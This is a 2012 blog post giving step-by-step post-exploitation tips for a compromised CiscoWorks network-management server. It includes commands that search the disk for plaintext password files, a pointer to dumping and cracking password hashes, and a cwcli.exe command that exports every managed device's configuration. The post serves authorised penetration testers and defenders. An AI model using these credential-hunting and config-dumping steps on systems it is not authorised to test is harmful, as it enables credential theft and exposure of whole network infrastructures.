Tuesday, June 26, 2012

Hack Tips: CiscoWorks Exploitation

by Tony Lee.

This article is the third in a series (See Hack Tips: Blackberry Enterprise Server and Hack Tips: Good For Enterprise) covering, step-by-step, practical post-exploitation tips that can be used to get the most out of various common network servers. This week’s victim is CiscoWorks. Compromising this server allows the attacker to remotely control network devices and dump all device configurations.

Even though CiscoWorks is End of Life (EOL)--replaced by Cisco Prime Infrastructure (CPI), we still see this management product present in many environments--thus is it still useful to know how to get the goods from Works.


Overall, the process involves the following steps:
  1. Identifying a CiscoWorks Server
  2. Obtaining CiscoWorks Administrator Credentials
  3. Interfacing with the CiscoWorks Web Interface
  4. Interfacing with the CiscoWorks Command Line Interface
  5. Dumping configs from CiscoWorks

Identifying The Host

  1. Host naming scheme
    • \\CiscoWorksBox
    • \\CISCOWKS
    • \\NETMNG
  2. Application Directory
    • C:\Program Files (x86)\CSCOpx
  3. User accounts
    • causer (Ciscoworks anonymous access user)
      C:\ >net user
      User accounts for \\CiscoWorksDemoBox
      casuser                  user                  user2
      The command completed successfully.
  4. Services
    • These Windows services are started:
      C:\ >net start
         CiscoWorks ANI database engine
         CiscoWorks Daemon Manager
         CiscoWorks RME NG database engine
         CiscoWorks Tomcat Servlet Engine
         CiscoWorks Web Server

Identifying Ciscoworks Account Credentials

  1. Dump the local Windows password hashes and crack them
  2. Data mine the Cisco works box for .bat and .txt files that contain plaintext credentials. This is surprisingly successful, network engineers are usually responsible for managing Ciscoworks and they are notorious for being security ignorant. We recently found a test .bat file that was using ut.exe (a Ciscoworks tool) that disclosed the Cisco Works credentials in plain-text.
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*

Interacting with Ciscoworks

Next we'll take a look out how we can interact with Ciscoworks and pull data from it.

Using the Ciscoworks Web Interface

CiscoWorks interface and options post-authentication

Source: http://www.netadmin.calpoly.edu/tools/cv-images/homepage.jpg

Surf to either of the URLs below for nice screenshots and great summarizations
  • http://hostname:1741
  • https://hostname

From the local system, you can confirm Ciscoworks is listening by checking for a listener on TCP 1741, or TCP 443:
C:\> netstat -ano | findstr 1741
  TCP               LISTENING       5136

C:\ >netstat -ano | findstr 443
  TCP               LISTENING       5136

Using the Ciscoworks Command line Application

The Ciscoworks command line application (cwcli.exe) have tons of options, including remotely running commands on devices! This could be very useful for an attacker, just use it with caution, because it could really get you into trouble if you don't know what you're doing!

Running cwclie.exe is more or less straightforward, but you'll definitely have to check out the -help for all features.

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe -help
CiscoWorks command line Application.
General syntax to run a command with arguments is

For detailed help on a command and it's arguments, run
cwcli  -help

Dumping Device Configs from CiscoWorks

One note worthy feature of cwclie.exe is its ability to dump device configurations from the command line! If you had an unlimited amount of time, you could obtain every config from every device on the network. Here's how to tell cwclie.exe to grab those configs.

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe export config -u  -p  -device %

        Successful: ConfigExport: C:/PROGRA~2/CSCOpx/files/rme/cwconfig

The % character is a wild card when using cwclie.exe. Using this, you could potentially dump all configuration from all Ciscoworks-managed devices! Just note that this could take a really long time on a large network. Also, its probably worth while for us to note that as a general best practice, system administrators should never use the -p option and specify the password on the command line -- this includes within scripts.

And just to confirm we dumped some configurations:
C:\Program Files (x86)\CSCOpx\bin>dir ..\files\rme\cwconfig
Volume in drive C has no label.
Volume Serial Number is 0000-0000

Directory of C:\Program Files (x86)\CSCOpx\files\rme\cwconfig

12/25/2011  06:40 PM    <DIR>          .
12/25/2011  06:40 PM    <DIR>          ..
12/25/2011  06:40 PM            26,621 2011-11-09-06-40-28-950-devicename.xml
12/25/2011  06:40 PM            26,768 2011-11-09-06-40-29-919-devicename.xml
12/25/2011  06:40 PM            30,782 2011-11-09-06-40-30-294-devicename.xml
12/25/2011  06:40 PM            27,441 2011-11-09-06-40-30-591-devicename.xml
12/25/2011  06:40 PM            30,656 2011-11-09-06-40-30-841-devicename.xml
12/25/2011  06:40 PM            30,833 2011-11-09-06-40-31-247-devicename.xml
               6 File(s)        173,101 bytes
               2 Dir(s)  129,615,876,096 bytes free


No comments:

Post a Comment